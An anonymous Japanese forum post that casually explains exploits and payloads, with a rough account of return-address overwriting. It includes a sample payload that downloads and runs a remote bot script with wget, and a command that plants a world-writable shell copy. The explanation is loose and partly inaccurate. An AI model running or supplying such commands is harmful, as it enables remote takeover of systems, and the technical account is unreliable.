370 - 一般ノルウェー市民 2019/07/05(金) 08:49:55.54 ID:kzFD6Yv30
よくイメージされるハッキングはexploitとpayloadって言うのがあるナリ
exploitは脆弱性、payloadは実行させたいコマンドって意味ナリよ
exploitは返却値までゴミデータなんかを入れて返却値には参照させたいメモリアドレスを入力する
payloadはexploitによって参照されるメモリアドレスに配置して実行されるコマンドそのもの
例えばcd /temp/ && wget http〜/gcat.py && chmod 777 gcat.py && python gcat.pyとか
ボットの必要が無い程度ならcd /temp/ && cp -a /bin/sh /temp/sh && chmod 777 /temp/shとかが書かれてたりする(コマンドは適当
それで複雑なことをするなら毎回payload送るよりマルウェアを送った方が早いって話ナリね
大体こんな感じナリ